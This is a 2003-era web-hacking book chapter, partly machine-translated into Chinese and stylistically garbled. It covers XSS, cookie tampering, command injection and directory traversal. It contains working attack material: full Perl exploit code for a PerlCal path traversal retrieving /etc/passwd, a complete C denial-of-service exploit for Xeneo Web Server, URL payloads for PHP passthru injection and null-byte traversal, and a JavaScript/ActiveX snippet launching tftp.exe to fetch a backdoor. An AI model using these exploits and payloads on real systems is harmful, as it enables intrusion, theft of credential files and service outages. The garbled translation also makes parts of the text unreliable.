黑客将研究最普通最广泛使用的web服务方面的东西,想找远程的可利用的漏洞来获得root或者是完全登陆权限。这样做的原因是因为,当找到一个远程的可利用的bug,就可以让黑客可以在如果不是上万至少也是上千的机器组成的主机上使用恶意代码。
Web 应用程序的演变
在今天的Internet 环境中,它是一个由分散在全球的不同的技术,协议和操作系统的混合体。通过使用这种混和体,这就可能使应用程序相互交流造成障碍。
Web 应用软件有着对用户和开发者异常强大的潜力,但是他们也能成为安全和系统管理的噩梦,大部分web服务编码于迂回某种现存的安全执行程序,支持某些应用程序称为结构,并且也不独立与自身的平台上。大部分公和其他的开发者写代码急于配置和应用web服务。这就就是为什么有这么多漏洞可以在这些代码中被发现,这些漏洞使顾客和系统用户暴露在攻击之下。
大多数web应用程序是连续的具有更多的功能性和分配更多的伸缩功能,这在代码中的增加了许多潜在的漏洞。 公司指望利用形成的技术来获得竞争优势,但是他们应该能够有把握在产品卖给公众以前有一个安全专家查看这些代码。这将有助于避免黑客在应用程序中发现远程的或者本地的漏洞bug的可能性。大多数web攻击是在应用程序这一层。黑客不需要广泛的知识来获得登录到本地网络或者是一个独立的系统
表请看1-1;这是一个小的典型的web应用程序的技术总计
表 1-1 web 应用程序技术
Table 1-1 Web Application Technologies
软件 技术
Vendor TechnologiesSun Microsystems Java 2 Enterprise EditionBEA WeblogicIBM WebsphereMicrosoft javascript, ASP.NET, ISAPI, Common Object Model (COM), Active Server Pages (JSP) Apache Jakarta (server-site Java) and PHPGeneric HTML, Perl and CGI
Web 开发的演变
随着web应用软件形式的发展,web开发也得到长足的发展,从一个很基本的目录表到远程可利用的缓冲溢出,许多公司努力找到他们能作到的方式来写安全代码,但是黑客也不断的在寻找新的、更复杂的方法来找到bug和利用他们的方法
恶意的对象:Java/ActiveX Objects
Java and javascript
Java objects或者是applets是Sun微系统上的用java程序语言代码编写的小应用程序,java是一种面向对象的语言。它能把所有的元素当作对象处理,java 编码和风状在一个叫.class的文件中,这个文件存储在web服务器中,当在另外一种语言的web客户端上,它的代码不会被泄露。Java是当今最有优势的用于internet开发工具之一,java为开发者提供可移植的代码,开发者的开发可以在客户段可通过web执行。
另外黑客盯上的一种途径,就是利用javascript,javascript是种脚本语言,它能应用在许多服务器段和客户端应用程序中。
javascript 主要用于接受用户的输入,并且把其他的一些组件捆绑在一起。最主要的web浏览器都内建了javascript引擎,它能接受这些无格式的javascript文本代码,并在客户段将突发的指令翻译。下面是一个非常基本的javascript例子,它展示了当一个按钮被点击时的popup box
Example: javascript Popup Box
1<html>
2 <head>
3<title>Basic javascript Example</title>
4<script language=javascript”>
5<!—hide for javascript challenged browsers
6
7function popup1()
8{
9
10 alert(“Hello World!”);
11
12}
13
14</script>
15 </head>
16<h1 align=center>Basic javascript Example</h1>
17<div align=center>
18 <form>
19<input type=”button” value=”Hello World!” οnclick=”popup1()”>
20</form>
上面的例子是让你熟悉这种语言的,并且让你知道当web黑时应该如何知道。
因为javascript是在客户端执行的,一个黑客就能通过输入可以执行的非标准的数据来导致应用程序输出敏感的信息或者导致应用程序崩溃。
下面是一个恶意javascript的利用实例,javascript将在客户端的本地机器上执行tftp.exe这个程序。
Example: Execute TFTP Client
21<html>
22 <head>
23
24<title>Execute tftp.exe</title>
25<script language=javascript”>
26<!—hide for javascript challenged browsers
27
28var popup1 = window.createPopup();
29
30function popup2()
31{
32
33 var popUpBody = popup2.document.body;
34 popUpBody.innterHTML = ‘<OBJECT NAME=”X”
35 CLASSID=CLSID:11111111-1111-1111-1111-111111111111”
36 CODEBASE=”C:/Windows/system32/tftp.exe”>
37 </OBJECT>’;
38 popup2.show(390, 290, 300, 300, document.body);
39
40}
41
42</script>
43
44<P οnclick=openpopup2();><U><fontcolor=#BBBBB>TFTP</font></U></P>
通过下面的代码,当点击“TFTP”连接时,就在远程系统上面打开TFTP (Trivial Transfer File Protocol)客户端。一旦TFTP通过,TFTP客户端就能下载一些恶意代码,例如后门程序,使黑客可以获得完全登录系统权限
ActiveX
微软已经发明他自己的客户端脚本模式,这种模式通常称为ActiveX. ActiveX是另外两种称为COM和OLE 技术的副产品。不象javascript, ActiveX有完全登陆操作系统的权限,这就是为什么微软开发一个注册系统的原因,这样,可户的浏览可以被识别并且在执行他以前授权给一个ActiveX 控件
典型的web应用程序
跨区域脚本
Cross-Site Scripting
跨区域脚本攻击是当今最平常的安全问题之一。今天绝大部分web站点包含了许多动态的目录,使站点看起来更适合用户。Web应用程序被用来完成和分发不同类型的输出到用户,这些输出依赖于web浏览器的设置。动态web站点有而静态web站点没有的威胁,它被称为”跨区域脚本”
当一个web应用程序从客户端搜集敏感或者是恶意的数据,这就是大家知道的一个跨区域脚本攻击。通常,这些数据包含在一个包含有恶意代码在里面的超级连接的表单里,黑客就可以利用用户点击一个恶意连接到一个email.及时消息,论坛帖子或者是一个web站点。一旦数据从web应用程序搜集,它将产生一个原先发送给它的包含有恶意数据的页面给用户,但是在某种程度上使他看起来象它是从正确站点来的有效内容。
一个跨区域脚本攻击的实例
如果一个web站点或者是web服务器,没有检测脚本代码并且把它逐字的发送回用户的浏览器,这是当致命的破坏产生时的情况。黑客能使用跨区域脚本的弱点来获得一个用户的cookies,登陆的详细清单和其他的敏感信息。
有几种产品遭受跨区域脚本攻击,它们都容许黑客使用java Servlet容器来发回恶意的javascript代码。这就容许黑客建构跨区域脚本攻击,在用户想要从信任的服务器上接收恶意脚本代码
下面是几个老的容易受到跨区域脚本攻击的web服务器
Resin 1.2.2:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.jsp
WebSphere 3.02:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.jsp
JRun 3.0:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.shtml
These pages will produce the following output:
Message: File not found: file://
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
Coolkie 被操纵
Cookie 操作是一种形式的攻击,这种攻击,黑客能够在客户端和web应用程序之间修改特殊的数据,而不有意的直接存储。这种形式的攻击能够用URL字符串,Cookies和表格区来完成,这种形式的攻击就是大家所知道的man-in-the-middle攻击。
Cookies 主要用于方便存储用户数据和参数,并且包含记号在其中。大多数的cookies能够被用户修改,而且能用一个不同的地址请求送回到服务器。有完全免费的工具完成这些任务。Cookie被操纵的范围cookie所用于的方面有关。大多数的cookie用于
Most cookies are used for session tokens to a range of arrays that make authentication decisions.
大约90%的cookie是基于64位编码的,下面是一个基本的,当一个浏览器接受一个http头的例子。
Example: Set-Cookie
Set-Cookie: varUserName=c0nnie;&varUserID=TF7044959 expires=Thu, 19 July 2010 20:00:00 GMT; path=/; domain=.security-protocols.com
浏览器将把这些当作命令来解释并且将它留下的值保存下到这页中。所以,不论无论什么时候,拥护从服务器请求一个页面,它将包含下面这些作为额外数据的cookie防在http的头部。下面是一个http头的例子,它是当用户已经登陆了以后被web应用程序送回的
Cookie: varUserName=c0nnie;&varUserID=TF7044959
就象你能够从这个例子看到的,cookie用于保留我们的登陆id的记录。这就是好的方法——经常将所有你的cookie从你当地机器中删除的原因。Cookie是一个基于要被送回服务器的无格式文本输入很明白无误,它应该被轻易的改变。所以你要思考,通过操纵一个cookie,一个黑客能够获得什么。
示例的cookie是很直接并且很容易利用,就象你能够看到的,用户ID的值框是我们应当尝试和改变的。一旦我改变它的值,并且从新登陆到服务器,我就能获得” Welcome Phil”这样的消息。看起来就象我们已经储存了另外一个用户的登陆和使用的帐号。所以,我敢打赌,你很惊讶为什么web应用程序知道用户的ID 为TF7044959的名字是Phil?我们站点,Phil更本就没有登陆,所以,它必需已经象一个数据库一样储存在系统之中
找到可以利用的漏洞的技巧
Techniques for Finding and Exploiting Vulnerabilities
Web servers have always been the easiest way for a hacker to get into a internal network, or just to compromise systems exposed on the Internet. As we were saying in the beginning of this chapter, web applications are normally coded as fast as possible and the thought of coding securely never enters the mind of the programmers. They are numerous ways of finding vulnerabilities in web servers. In the next few sections will have examples of common fingerprints which are used in exploitation of both web servers and web applications.
Basic Exploitation Techniques
‘<?’ Method
The ‘<?’ method can be used to insert PHP into a remote web application. It is possible to execute arbitrary commands on a remote server using this technique. Below is an example on how it can be used.
Example: <?
http://target_host/webapp.php=<?passthru("id");?>
On some PHP applications, this may allow the command to be executed locally on the remote host under the user the web server is running as.
‘;’ Method
The ‘;’ character allows multiple commands to be executed on a UNIX or Linux machines.
Example: ‘;’
[root@c0nnie]# id;uname –a uid=0(root) gid=0(root) groups=0(root) Linux c0nnie 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux
This technique is often used to execute multiple commands on a web server in order to gain sensitive information.
‘|’ Method
The pipe character is often used in UNIX or Linux system to help execute multiple commands at a time in one single request.
Example: ‘|’
http://target_host/foobar.pl?page=../../../../bin/ls%20-al%20/home|
The following request will give a full directory listing of the ‘home’ directory on the targeted host.
‘%00’ Method
The %00 is the hex value of a null byte. This can be used to trick a web application into thinking that a different file type is being requested.
Example: ‘%00’
http://target_host/foobar.pl?page=../../../../etc/passwd
By making this request, the web application will disallow this request because it is checking for a valid file name like .asp, .html or any other type of file extension.
http://target_host/foobar.pl?page=../../../etc/passwd%00html
Now with this request, it tricks the web application into thinking that the filename ends in one of its file types. This is a very common problem in web applications.
‘%20’ Method
The %20 is the hex value for a blank space. This request can be used to help you execute commands on the host. See the example below.
Example: ‘%20’
http://target_host/foobar.pl?page=uname%20-a|
The following example above will output the ‘uname –a’ command on a UNIX or Linux system. This may allow for an attacker to see what type of operating system the host is running. Or, this method can be used with other types of variations of choice.
Directory Traversal Vulnerabilities
A directory traversal is when a web application and or web server does not filter out bad characters which are sent by a hacker. A hacker can send a bad request resulting in the disclosure of directories and files outside the normal bounding HTTP root directory.
PerlCal cal_make.pl Directory Traversal
Back in April 2001 a guy by the name of Stan a.k.a The Pike found a directory traversal in PerlCal cal_make.pl. PerCal is a web scheduler/calendar server which is managed by CGI scripts. This particular vulnerability allows anyone to download any file on the local system. Below is an example HTTP request to do so.
Example: ‘cal_makel.pl’
http://target_host/ /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
The following request will retrieve the local system passwd which contains all the user accounts on system. Now if this is an older system, the passwd may not be shadowed making it easy to crack. I coded a very simple exploit for this vulnerability below.
PerlCal cal_make.pl Exploit
1#!/usr/bin/perl
2# PerlCal cal_make.pl directory traversal
3# this vuln was found by: Stan a.k.a. ThePike
4#
5# Vulnerable systems:
6# PerlCal version 2.95 and prior (UNIX)
7#
8# Written by tommy <tommy@security-protocols.com>
9# For Security-Protocols Research Labs
10# 09/09/02
11#
12# usage:
13# perl sp-perlcal.pl targeted_host /etc/passwd or /proc/version
14#
15#
16################
17
18use IO::Socket;
19use strict;
20
21print "-"x74;
22print "/nPerlCal cal_make.pl directory traversal, tommy/@security-protocols.com/n";
23print "-"x74;
24print "/n/n";
25
26my $host = $ARGV[0];
27my $port = 80;
28my $fuxor = "/etc/passwd%00";
29my $lin;
30my @thedata;
31
32($ARGV[1]) && ($fuxor = $ARGV[1]."%00");
33
34print "w0rking on getting $fuxor from $host/n";
35
36my $tcpval = getprotobyname('tcp');
37my $serverIP = inet_aton($host);
38my $serverAddr = sockaddr_in(80, $serverIP);
39my $protocol_name = "tcp";
40
41my $iaddr = inet_aton($host) || die print("host was not found: $host");
42my $paddr = sockaddr_in($port, $iaddr) || die print("you did something wrong stupid... exiting...");
43my $proto = getprotobyname('tcp') || die print("cannot get protocol");
44socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("socket could not open: $!");
45connect(SOCK, $paddr) || die print("cannot connect: $!");
46
47my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../..$fuxor/n/n";
48send(SOCK,$submit,0);
49@thedata=<SOCK>;
50
51close (SOCK);
52
53foreach $lin(@thedata)
54{
55print "$lin";
56}
57
58print "/n-----------------------------------EOF------------------------------------/n/n";
Web Server and Web Application Vulnerability Scanning Software
We present this in section some tools which can be used to identify web server software vulnerabilities. We have used, and evaluated almost all web server vulnerability scanners and the following seem to be the best to use.
Nikto
Nikto is a web server vulnerability scanner written by Chris Sullo. Nikto performs comprehensive testing against web servers for multiple vulns including misconfigurations, insecure or default files and scripts and over 130 versions of servers. We feel that this is the best available free web server scanner out there. Nikto uses RFP’s Lib Whisker as a base for all socket functionality. Some of Nikto’s main features are; multiple IDS invasion techniques, SSL support, and Perl plug-in support.
Nikto has so many checks, and can scan so fast that it will overwhelm smaller web servers, and will defiantly be seen in intrusion detection logs and web server logs. There is an IDS invasion option which can be used. The best thing about this tool is that you code your own plug-ins if you want.
Whisker
Well the much long anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool. The main function of Whisker is to scan web server for files on remote web servers. Whisker was introduced in the earlier days when most bugs were associated with CGI scripts that had known vulnerabilities that could be exploited. Below we will demonstrate this by showing you how Whisker works. Please note that Whisker is a Perl script, so make sure you have Perl installed.
Whisker comes with a set of database files which the scan engine takes as its primary configuration file. The included database files tell Whisker what directories to look for, what files to look for and a few other things like how web servers react to certain requests. Here is how to run Whisker against a host:
[tf0ne@c0nnie tf0ne]$ perl -h http://target_host.com/
-----------------------------------------------------------------------
Title: Notice
Whisker scans for CGIs by checking to see if the server says a particular URL exists. However, just because a URL exists does not necessarily mean it is vulnerable/exploitable--the vulnerability might be limited to only a certain version of the CGI, and the server might not be using the vulnerable version. There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability.
Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or searching for the CGI name on SecurityFocus.com or Google.com.
-----------------------------------------------------------------------
Beginning scan against http://www.target_host.com
----------------------------------------------------------------------
Whisker is currently crawling the website; please be patient.
-----------------------------------------------------------------------
Title: Server banner
Id: 100
Severity: Informational
The server returned the following banner:
Microsoft-IIS/5.0
-----------------------------------------------------------------------
Whisker is done crawling the website.
-----------------------------------------------------------------------
Title: Server banner
Id: 100
Severity: Informational
The server returned the following banner:
Microsoft-IIS/5.0
-----------------------------------------------------------------------
Title: Server OPTIONS results
Id: 109
Severity: Informational
The server responded to an OPTIONS query with the following public methods:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOC, UNLOCK, SEARCH
The allowed methods for '/' are:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
-----------------------------------------------------------------------
Title: Server patch level
Id: 111
Severity: Informational
Testing indicates server patch level to be at or after the following level: Win2K IIS-SRP1 (MS02-018) or SP3
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 621
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspired/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 622
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspiredtutorial/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 624
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/push/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 627
Found URL: /siteserver/publishing/viewcode.asp
No specific information is provided for this item.
-----------------------------------------------------------------------
Title: Encountered cookies
Severity: Informational
The following cookies were encountered while scanning:
ASPSESSIONIDSCQATDSA=POKECCICFCJFEMDBHHMKLFIG; path=/
-----------------------------------------------------------------------
Whisker scan completed in 1 minute.
After looking over the output, Whisker has found several potentially exploitable files and directories on this Microsoft IIS 5.0 system. The nice thing about Whisker 2.1 is that it provides URL links, and detailed information of the files it has found. Whisker is a very powerful tool that is easy to use for anyone. We hope that RFP continues to support this great tool.
Shadow Security Scanner
One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner, but a full fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.
Shadow Security Scanner was designed to identify known vulnerabilities, with suggest fixes to identified vulnerabilities, and also reports other security holes within the network. Shadow Security Scanner has very flexible policies on which audits to perform. There is a nice policy wizard which helps you specifically select which ports you wish to scan.
Figure1-1 Shadow Security Scanner
The reports that are produced after a scan are very detailed which makes it easy for any user to read, and act on found vulnerabilities within there network. Shadow Security Scanner has a very nice auto-update feature which allows you too update the scan modules on a daily basis. All though, this tool is not free it is defiantly worth a try if you are looking for a robust tool.
Blindly Fuzzing Web Servers for Vulnerabilities
I have had allot of success with fuzzing web servers and other applications for bugs. There are a few really good fuzzier tools out there. From my experience, SPIKE which was written by Dave Aitel has found numerous remotely exploitable bugs.
SPIKE
Spike 是一个API和一种用许你快速的创建网络协议重点测试工具,Spike将使复制任何复杂的二进制协议变的飞快。最酷的事情是你可以在新的产品上测试旧的技术,对多数表住的web应用程序,SPIKE能快速发现缓冲器溢出,SQL injection bugs和format string bugs.我发现这对工作非常有用
通过perl脚本使用SPIKE’的框架有很多优点,
There are many advantages to using SPIKE’s framework over using Perl scripts. SPIKE integrates very well with libntlm and other GPL’ed libraries for doing encryption and or other types of things that you don’t have Perl modules.
SPIKE Programs for Web Applications
·generic_web_server_fuzz
·closed_source_web_server_fuzzer
·webfuzz.c
·webmitm
·ntlm2/ntlm_brute
Below I will show you how to run SPIKE using the closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Lets see what we find!
[tf0ne@c0nnie src]$ ./closed_source_web_server_fuzz 192.168.1.103 80 GET / index .html 0 0
After about an hour of fuzzing, the closed_source_web_server_fuzz program segfaulted (meaning that it found a bug). After looking over the output from SPIKE, I found that the following GET request crashed the web server:
GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1
Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cookie: VARIABLE=SPLABS; path=/
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)
Variable: result
Host: localhost
Content-length: 513
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
现在,我们一个恶意包,我们可以很容易编写利用代码,下面的开发将再生这样的漏洞
Xeneo Web Server 2.2.2.10.0 DoS Exploit
59/* Xeneo Web Server 2.2.2.10.0 DoS
60 *
61 * Vulnerable systems:
62 * Xeneo Web Server 2.2.10.0
63 * Vendor:
64 * http://www.northernsolutions.com
65 *
66 * Written and found by tommy <tommy@security-protocols.com>
67 * For SP Research Labs
68 * 04/23/2003
69 *
70 * www.security-protocols.com
71 *
72 * usage:
73 * sp-xeneo2 <targetip> [targetport] (default is 80)
74 */
75
76
77#include <winsock2.h>
78#include <stdio.h>
79
80#pragma comment(lib, "ws2_32.lib")
81
82char exploit[] =
83
84"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1/r/n"
85"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
86"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
87"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
88"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
89"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
90"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
91"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
92"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
93"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
94"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%/r/n"
95"Content-Type: application/x-www-form-urlencoded/r/n"
96"Connection: Keep-Alive/r/n"
97"Cookie: VARIABLE=SPLABS; path=//r/n"
98"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)/r/n"
99"Variable: result/r/n"
100"Host: localhost/r/n"
101"Content-length: 513/r/n"
102"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png/r/n"
103"Accept-Encoding: gzip/r/n"
104"Accept-Language: en/r/n"
105"Accept-Charset: iso-8859-1,*,utf-8/r/n/r/n/r/n"
106"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
107"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
108"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
109"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
110"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
111"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
112"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
113"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
114"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
115"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/r/n";
116
117int main(int argc, char *argv[])
118{
119WSADATA wsaData;
120WORD wVersionRequested;
121struct hostent *pTarget;
122struct sockaddr_in sock;
123char *target, buffer[30000];
124int port,bufsize;
125SOCKET mysocket;
126
127if (argc < 2)
128{
129printf("Xeneo Web Server 2.2.10.0 DoS/r/n <tommy@security-protocols.com>/r/n/r/n");
130printf("Tool Usage:/r/n %s <targetip> [targetport] (default is 80)/r/n/r/n");
131printf("www.security-protocols.com/r/n/r/n");
132exit(1);
133}
134
135wVersionRequested = MAKEWORD(1, 1);
136if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
137
138target = argv[1];
139
140//for default web attacks
141port = 80;
142
143if (argc >= 3) port = atoi(argv[2]);
144bufsize = 512;
145if (argc >= 4) bufsize = atoi(argv[3]);
146
147mysocket = socket(AF_INET, SOCK_STREAM, 0);
148if(mysocket==INVALID_SOCKET)
149{
150printf("Socket error!/r/n");
151exit(1);
152}
153
154printf("Resolving Hostnames.../n");
155if ((pTarget = gethostbyname(target)) == NULL)
156{
157printf("Resolve of %s failed/n", argv[1]);
158exit(1);
159}
160
161memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
162sock.sin_family = AF_INET;
163sock.sin_port = htons((USHORT)port);
164
165printf("Connecting.../n");
166if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
167{
168printf("Couldn't connect to host./n");
169exit(1);
170}
171
172printf("Connected!.../n");
173printf("Sending Payload.../n");
174if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
175{
176printf("Error Sending the Exploit Payload/r/n");
177closesocket(mysocket);
178exit(1);
179}
180
181printf("Remote Webserver has been DoS'ed /r/n");
182closesocket(mysocket);
183WSACleanup();
184return 0;
185}
你可以用Microsoft Visual Studio 6.0.来编译这个漏洞
摘要
在这一章当中,我们已经学习了许多扫描和找出漏洞以及发现在web服务器应用程序弱点的方法,这样做很重要,及时打上卖主的安全补丁,关闭web服务器上的一些功能,经常扫面出你自己网络的漏洞。
参考书目
安全网址
http://security-protocols.com
http://eEye.com
http://packetstormsecurity.nl
http://astalavista.com
扫描工具
Niktohttp://www.cirt.net/code/nikto.shtml
Whisker http://www.wiretrip.net/rfp/
Shadow Security Scanner http://www.safety-lab.com
模糊工具
SPIKEhttp://www.immunitysec.com/spike.html
badpack3t
badpack3t@security-protocols.com
www.security-protocols.com
Copyright © 2000-2003 Security-Protocols Inc. All trademarks are property of their respective owners and are used here for entertainment purposes only.
2105
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
